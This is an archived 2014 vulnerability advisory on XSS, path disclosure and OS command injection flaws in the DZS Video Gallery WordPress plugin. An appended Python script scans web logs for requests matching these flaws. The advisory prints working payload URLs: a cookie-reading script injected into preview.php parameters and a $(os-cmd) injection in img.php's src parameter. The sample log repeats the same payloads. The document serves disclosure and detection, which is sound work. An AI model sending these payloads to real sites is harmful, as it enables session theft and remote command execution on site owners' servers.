History: Aug 26, 2014 - 12:00 a.m.

XSS, FPD and RCE vulnerabilities in DZS Video Gallery for WordPress

2014-08-26 00:00:00
vulners.com

Hello 3APA3A!

These are Cross-Site Scripting, Full path disclosure and OS Commanding vulnerabilities in the DZS Video Gallery plugin for WordPress.

Earlier I've disclosed Content Spoofing and Cross-Site Scripting vulnerabilities in this plugin (http://securityvulns.ru/docs30871.html).


Affected products:

Vulnerable are all versions of DZS Video Gallery for WordPress.


Affected vendors:

Digital Zoom Studio
http://digitalzoomstudio.net


Details:

Cross-Site Scripting (WASC-08):

http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

http://site/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?designrand=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure (WASC-13):

http://site/wp-content/plugins/dzs-videogallery/videogallery.php

http://site/wp-content/plugins/dzs-videogallery/admin/sliderexport.php

FPD in the plugin's PHP files (by default) or in error_log, in all folders of the plugin. The files vary depending on the version of the plugin.

OS Commanding (WASC-31):

http://site/wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=http://site/1.jpg$(os-cmd)

RCE using the method of Pichaya Morimoto (http://seclists.org/fulldisclosure/2014/Jun/117).


Timeline:

2014.05.08 - announced at my site.
2014.05.09 - informed the developer, but he ignored it.
2014.07.12 - disclosed at my site (http://websecurity.com.ua/7152/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
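The following is an added example, not part of MustLive's post or of the DZS Video Gallery plugin: a small detection script a site operator could run over web server access logs to spot requests shaped like the two vectors described above (HTML markup reflected through the `swfloc`/`designrand` parameters of `deploy/designer/preview.php`, and shell metacharacters in the `src` parameter of `img.php?webshot=1`). The log lines, client addresses and hostnames are constructed sample data; the parameter and script names come from the advisory.

```python
"""Flag DZS Video Gallery requests matching the advisory's XSS and OS-commanding
vectors in Apache Common Log Format lines. Added example; sample data is constructed."""
import re
from urllib.parse import urlsplit, parse_qs

# Common Log Format: client, identd, user, [timestamp], "METHOD target HTTP/x", status
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

PLUGIN_PREFIX = "/wp-content/plugins/dzs-videogallery/"

# Parameters the advisory names as reflected into preview.php output (tuple for stable order).
XSS_PARAMS = ("swfloc", "designrand")
# Any opening/closing tag start, e.g. "<script" or "</script", after percent-decoding.
HTML_MARKUP = re.compile(r"<\s*/?\s*[a-z!]", re.IGNORECASE)

# Characters that let a value break out of a string passed to a shell.
SHELL_META = re.compile(r"[`$;|&<>\n]")


def classify(target):
    """Return a finding label for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    if not parts.path.startswith(PLUGIN_PREFIX):
        return None
    script = parts.path[len(PLUGIN_PREFIX):]
    # parse_qs percent-decodes values, so encoded payloads are inspected in decoded form.
    qs = parse_qs(parts.query, keep_blank_values=True)

    if script == "deploy/designer/preview.php":
        for name in XSS_PARAMS:
            if any(HTML_MARKUP.search(v) for v in qs.get(name, [])):
                return "xss_preview_" + name

    if script == "img.php" and qs.get("webshot", [""])[0] == "1":
        if any(SHELL_META.search(v) for v in qs.get("src", [])):
            return "os_command_img_src"
    return None


def scan_log(lines):
    """Return (client, label, target) for every log line that matches a vector."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF; skip rather than guess
        label = classify(m.group("target"))
        if label:
            findings.append((m.group("client"), label, m.group("target")))
    return findings


# Constructed sample log (not real traffic). Lines 2 and 4 mirror the advisory's vectors.
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Aug/2014:00:00:01 +0000] "GET /wp-content/plugins/dzs-videogallery/'
    'deploy/designer/preview.php?swfloc=video.swf&designrand=12 HTTP/1.1" 200 512',
    '203.0.113.9 - - [26/Aug/2014:00:00:02 +0000] "GET /wp-content/plugins/dzs-videogallery/'
    'deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 640',
    '203.0.113.5 - - [26/Aug/2014:00:00:03 +0000] "GET /wp-content/plugins/dzs-videogallery/'
    'img.php?webshot=1&src=http://example.com/1.jpg HTTP/1.1" 200 20480',
    '203.0.113.9 - - [26/Aug/2014:00:00:04 +0000] "GET /wp-content/plugins/dzs-videogallery/'
    'img.php?webshot=1&src=http://example.com/1.jpg%24%28os-cmd%29 HTTP/1.1" 200 0',
    '203.0.113.7 - - [26/Aug/2014:00:00:05 +0000] "GET /index.php?s=%3Cscript%3E HTTP/1.1" 200 3000',
]

if __name__ == "__main__":
    for client, label, target in scan_log(SAMPLE_LOG):
        print(f"{client} {label} {target}")
```

Decoding before matching matters: the advisory's payloads arrive percent-encoded, so a rule that greps the raw request line for `<script` or `$(` misses them. The last sample line shows the path check at work: markup in an unrelated script's parameter is not attributed to this plugin.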